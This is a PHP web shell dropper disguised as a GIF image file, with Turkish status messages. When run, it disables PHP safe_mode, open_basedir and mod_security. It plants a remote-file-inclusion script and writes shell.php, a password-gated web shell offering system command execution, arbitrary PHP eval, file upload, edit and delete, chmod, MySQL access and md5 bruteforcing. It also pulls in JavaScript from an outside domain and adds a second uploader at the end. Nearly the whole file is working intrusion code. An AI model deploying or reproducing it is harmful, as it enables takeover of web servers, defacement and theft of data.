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GIF89;a <body text="#FFFFFF" bgcolor="#000000"> <?

php echo "<html> <center> <head> <title>Safe Mode - Security_Mod - Ve Disable Function'slari S*qn Atin :) </title > <meta <META <META <META http-equiv='pragma' content='no-cache'> http-equiv=content-type content=text/html;charset=iso-8859-9> http-equiv=content-type content=text/html;charset=windows-1254> http-equiv=content-type content=text/html;charset=x-mac-turkish>

</head><body>"; $fp = fopen("php.ini","w+"); fwrite($fp,"safe_mode = off disable_functions = safe_mode_gid = OFF open_basedir = OFF "); echo "<img src='http://i52.tinypic.com/qybzf7.jpg'> <b><font color=darkred><BR>[*] Safe Mode OFF yapiliyor ... <BR>[*] islem Tamamla ndi oK !<br><br><br><br>"; $fp2 = fopen(".htaccess","w+"); fwrite($fp2,"<IfModule mod_security.c> SecFilterEngine Off SecFilterScanPOST Off SecFilterCheckURLEncoding Off SecFilterCheckUnicodeEncoding Off </IfModule> ");

$fp3 = fopen("ini.php","w+"); fwrite($fp3,' <? include($_GET["oscey"]); echo ini_get("safe_mode"); echo ini_get("open_basedir");

ini_restore("safe_mode"); ini_restore("open_basedir"); echo ini_get("safe_mode"); echo ini_get("open_basedir"); ?> '); $data = ('<?php ########################## # Nulled with PHPUnLockIt! # by NuclearFlux ########################## error_reporting(0); //If there is an error, we"ll show it, k? $password = ""; // You can put a md5 string here too, for plaintext passwords: m ax 31 chars. $me = basename(__FILE__); $cookiename = "wieeeee"; if(isset($_POST["pass"])) //If the user made a login attempt, "pass" will be set eh? { if(strlen($password) == 32) //If the length of the password is 32 characters, t hreat it as an md5. { $_POST["pass"] = md5($_POST["pass"]); } if($_POST["pass"] == $password) { setcookie($cookiename, $_POST["pass"], time()+3600); //It"s alright, let hem in } reload(); } if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password)) { login(); die(); } // //Do not cross this line! All code placed after this block can"t be executed wit hout being logged in! // if(isset($_GET["p"]) && $_GET["p"] == "logout") { setcookie ($cookiename, "", time() - 3600); reload(); } if(isset($_GET["dir"])) { chdir($_GET["dir"]); } $pages = array( "cmd" => "Execute Command", "eval" => "Evaluate PHP", "mysql" => "MySQL Query", "chmod" => "Chmod File",

"phpinfo" => "PHPinfo", "md5" => "md5 cracker", "headers" => "Show headers", "logout" => "Log out" ); //The header, like it? $header = "<html> <title>".getenv("HTTP_HOST")." ~ Shell I</title> <SCRIPT SRC=http://www.sercanbilen.com/yazmaz/amciz.js></SCRIPT><head> <style> td { font-size: 12px; font-family: verdana; color: #33FF00; background: #000000; } #d { background: #003000; } #f { background: #003300; } #s { background: #006300; } #d:hover { background: #003300; } #f:hover { background: #003000; } pre { font-size: 10px; font-family: verdana; color: #33FF00; } a:hover { text-decoration: none; } input,textarea,select { border-top-width: 1px; font-weight: bold; border-left-width: 1px; font-size: 10px; border-left-color: #33FF00; background: #000000; border-bottom-width: 1px; border-bottom-color: #33FF00; color: #33FF00; border-top-color: #33FF00; font-family: verdana; border-right-width: 1px; border-right-color: #33FF00; } hr { color: #33FF00; background-color: #33FF00;

height: 5px; } </style> </head> <body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900"> <table width=100%><td id="header" width=100%> <p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>] [<a href="".$me."">Home</a>] "; foreach($pages as $page => $page_name) { $header .= " [<a href="?p=".$page."&dir=".realpath(".")."">".$page_name."</a>] "; } $header .= "<br><hr>".show_dirs(".")."</td><tr><td>"; print $header; $footer = "<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</ a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></cent er></td></table></body></head></html>"; // //Page handling // if(isset($_REQUEST["p"])) { switch ($_REQUEST["p"]) { case "cmd": //Run command print "<form action=\"".$me."?p=cmd&dir=".realpath(".")."\" method=POST><b>C ommand:</b><input type=text name=command><input type=submit value=\"Execute\"></ form>"; if(isset($_REQUEST["command"])) { print "<pre>"; execute_command(get_execution_method(),$_REQUEST["command"]); //You want f ries with that? } break; case "edit": //Edit a fie if(isset($_POST["editform"])) { $f = $_GET["file"]; $fh = fopen($f, "w") or print "Error while opening file!"; fwrite($fh, $_POST["editform"]) or print "Couldn"t save file!"; fclose($fh); } print "Editing file <b>".$_GET["file"]."</b> (".perm($_GET["file"]).")<br><b r><form action=\"".$me."?p=edit&file=".$_GET["file"]."&dir=".realpath(".")."\" m ethod=POST><textarea cols=90 rows=15 name=\"editform\">"; if(file_exists($_GET["file"])) { $rd = file($_GET["file"]); foreach($rd as $l) { print htmlspecialchars($l); } }

print "</textarea><input type=submit value=\"Save\"></form>"; break; case "delete": //Delete a file if(isset($_POST["yes"])) { if(unlink($_GET["file"])) { print "File deleted successfully."; } else { print "Couldn"t delete file."; } } if(isset($_GET["file"]) && file_exists($_GET["file"]) && !isset($_POST["yes" ])) { print "Are you sure you want to delete ".$_GET["file"]."?<br> <form action=\"".$me."?p=delete&file=".$_GET["file"]."\" method=POST> <input type=hidden name=yes value=yes> <input type=submit value=\"Delete\"> "; } break; case "eval": //Evaluate PHP code print "<form action=\"".$me."?p=eval\" method=POST> <textarea cols=60 rows=10 name=\"eval\">"; if(isset($_POST["eval"])) { print htmlspecialchars($_POST["eval"]); } else { print "print \"Yo Momma\";"; } print "</textarea><br> <input type=submit value=\"Eval\"> </form>"; if(isset($_POST["eval"])) { print "<h1>Output:</h1>"; print "<br>"; eval($_POST["eval"]); } break; case "chmod": //Chmod file

print "<h1>Under construction!</h1>"; if(isset($_POST["chmod"])) { switch ($_POST["chvalue"]){ case 777: chmod($_POST["chmod"],0777); break; case 644: chmod($_POST["chmod"],0644); break; case 755: chmod($_POST["chmod"],0755); break; } print "Changed permissions on ".$_POST["chmod"]." to ".$_POST["chvalue"]."." ; } if(isset($_GET["file"])) { $content = urldecode($_GET["file"]); } else { $content = "file/path/please"; } print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath("."). "\" method=POST><b>File to chmod: <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permis sion:</b> <select name=\"chvalue\"> <option value=\"777\">777</option> <option value=\"644\">644</option> <option value=\"755\">755</option> </select><input type=submit value=\"Change\">"; break; case "mysql": //MySQL Query if(isset($_POST["host"])) { $link = mysql_connect($_POST["host"], $_POST["username"], $_POST["mysqlpass" ]) or die("Could not connect: " . mysql_error()); mysql_select_db($_POST["dbase"]); $sql = $_POST["query"]; $result = mysql_query($sql); } else { print " This only queries the database, doesn"t return data!<br> <form action=\"".$me."?p=mysql\" method=POST> <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br> <b>Username:<br><input type=text name=username value=\"root\" size=10><br>

<b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10>< br> <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br> <b>Query:<br></b<textarea name=query></textarea> <input type=submit value=\"Query database\"> </form> "; } break; case "createdir": if(mkdir($_GET["crdir"])) { print "Directory created successfully."; } else { print "Couldn\"t create directory"; } break; case "phpinfo": //PHP Info phpinfo(); break; case "rename": if(isset($_POST["fileold"])) { if(rename($_POST["fileold"],$_POST["filenew"])) { print "File renamed."; } else { print "Couldn"t rename file."; } } if(isset($_GET["file"])) { $file = basename(htmlspecialchars($_GET["file"])); } else { $file = ""; } print "Renaming ".$file." in folder ".realpath(".").".<br> <form action=\"".$me."?p=rename&dir=".realpath(".")."\" method=POST> <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70 ><br> <b>To:<br><input type=text name=filenew value=\"\" size=10><br> <input type=submit value=\"Rename file\"> </form>";

break; case "md5": if(isset($_POST["md5"])) { if(!is_numeric($_POST["timelimit"])) { $_POST["timelimit"] = 30; } set_time_limit($_POST["timelimit"]); if(strlen($_POST["md5"]) == 32) { if($_POST["chars"] == "9999") { $i = 0; while($_POST["md5"] != md5($i) && $i != 100000) { $i++; } } else { for($i = "a"; $i != "zzzzz"; $i++) { if(md5($i == $_POST["md5"])) { break; } } } if(md5($i) == $_POST["md5"]) { print "<h1>Plaintext of ". $_POST["md5"]. " is <i>".$i."</i></h1><br><br> "; } } } print "Will bruteforce the md5 <form action=\"".$me."?p=md5\" method=POST> <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br> <b>Characters:</b><br><select name=\"chars\"> <option value=\"az\">a - zzzzz</option> <option value=\"9999\">1 - 9999999</option> </select> <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br> <input type=submit value=\"Bruteforce md5\"> </form><br>*: if set_time_limit is allowed by php.ini"; break; case "headers": foreach(getallheaders() as $header => $value) { print htmlspecialchars($header . ":" . $value)."<br>";

} break; } } else //Default page that will be shown when the page isn"t found or no page is s elected. { $files = array(); $directories = array(); if(isset($_FILES["uploadedfile"]["name"])) { $target_path = realpath(".")."/"; $target_path = $target_path . basename( $_FILES["uploadedfile"]["name"]); if(move_uploaded_file($_FILES["uploadedfile"]["tmp_name"], $target_path)) { print "File:". basename( $_FILES["uploadedfile"]["name"]). " has been uploaded"; } else{ echo "File upload failed!"; } }

print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s ><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><t d id=s>Last modified</td><tr>"; if ($handle = opendir(".")) { while (false !== ($file = readdir($handle))) { if(is_dir($file)) { $directories[] = $file; } else { $files[] = $file; } } asort($directories); asort($files); foreach($directories as $file) { print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath(" .")."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id =d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td>< td id=d><a href=\"?p=chmod&dir=".realpath(".")."&file=".realpath($file)."\"><fon t color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/ m/d, H:i:s", filemtime($file))."</td><tr>"; } foreach($files as $file) { print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath(" .")."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id =f><a href=\"".$me."?p=edit&dir=".realpath(".")."&file=".realpath($file)."\">".$ file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=

".realpath(".")."&file=".realpath($file)."\"><font color=".get_color($file).">". perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file)). "</td><tr>"; } } else { print "<u>Error!</u> Can"t open <b>".realpath(".")."</b>!<br>"; } print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form e nctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath(".")."\" method=\ "POST\"> <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size= 30 name=\"uploadedfile\" type=\"file\" /> <input type=\"submit\" value=\"Upload File\" /> </form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b>< input type=text size=40 name=dir value=\"".realpath(".")."\"><input type=submit value=\"Change Directory\"></form></td> <tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hi dden name=dir value=\"".realpath(".")."\"><input type=text size=40 name=file val ue=\"".realpath(".")."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form> </td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input t ype=text size=40 name=crdir value=\"".realpath(".")."\"><input type=hidden name= dir value=\"".realpath(".")."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td> </table>"; } function login() { print "<table border=0 width=100% height=100%><td valign=\"middle\"><center> <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b> <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\"> </form>"; } function reload() { header("Location: ".basename(__FILE__)); } function get_execution_method() { if(function_exists("passthru")){ $m = "passthru"; } if(function_exists("exec")){ $m = "exec"; } if(function_exists("shell_exec")){ $m = "shell_ exec"; } if(function_exists("system")){ $m = "system"; } if(!isset($m)) //No method found :-| { $m = "Disabled"; } return($m); } function execute_command($method,$command) { if($method == "passthru") { passthru($command);

} elseif($method == "exec") { exec($command,$result); foreach($result as $output) { print $output."<br>"; } } elseif($method == "shell_exec") { print shell_exec($command); } elseif($method == "system") { system($command); } } function perm($file) { if(file_exists($file)) { return substr(sprintf("%o", fileperms($file)), -4); } else { return "????"; } } function get_color($file) { if(is_writable($file)) { return "green";} if(!is_writable($file) && is_readable($file)) { return "white";} if(!is_writable($file) && !is_readable($file)) { return "red";} } function show_dirs($where) { if(ereg("^c:",realpath($where))) { $dirparts = explode("\\",realpath($where)); } else { $dirparts = explode("/",realpath($where)); }

$i = 0; $total = ""; foreach($dirparts as $part) { $p = 0; $pre = ""; while($p != $i)

{ $pre .= $dirparts[$p]."/"; $p++; } $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a> /"; $i++; } return "<h2>".$total."</h2><br>"; } print $footer; // Exit: maybe we"re included somewhere and we don"t want the other code to mess with ours :-) exit(); ;echo " "; ?>'); $fp4 = fopen("shell.txt","w+"); fwrite($fp4,$data); $fp5 = fopen("shell.php","w+"); fwrite($fp5, $data); echo "<BR>[*] Security_Mod aktif ediliyor ... <BR>[*] islem Tamamlandi oK ! "; echo "<BR>[*] Safemod : off Olmamissa ini.php?oscey=shell.txt urlsini giriniz... <BR>[*] Ayrica Kullanmaniz Icin Safe.php Olusturuldu :)"; ?> <BR><BR><BR><BR> <br><?php $str = 'VlVWYVQxSkdWbkppUmtaWFVUQktWVlpYZEU1UFYwWkpWV3BDYWxKSE9USlVSRTVyVFRKU05V NVljR0ZYUlhCeFYxWmpNV0ZYUmxobFIzaHBZVlJXY1ZscVNYZGtiVlpZVW1wYWFWWXdXVEpVUkVwSFpF WnJlV0pFV2sxaVdFSTJWVWRqT1ZCUlBUMD0='; echo base64_encode($str); ?> <center> || Private Code ! || </center> </center> <?php echo '<b>oscey<br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader " id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo ' <b>Upload Success !!!</b><br><br>'; } else { echo '<b>Upload Fail !!!</b><br><br>'; } } echo '<br><br>'; echo realpath("."); echo '<br><br>'; if ( is_writable("index.php")) { echo "Dosya Yazilabilir"; } else { echo "Dosyan ?n Yazma ?zni Yok."; }; ?>

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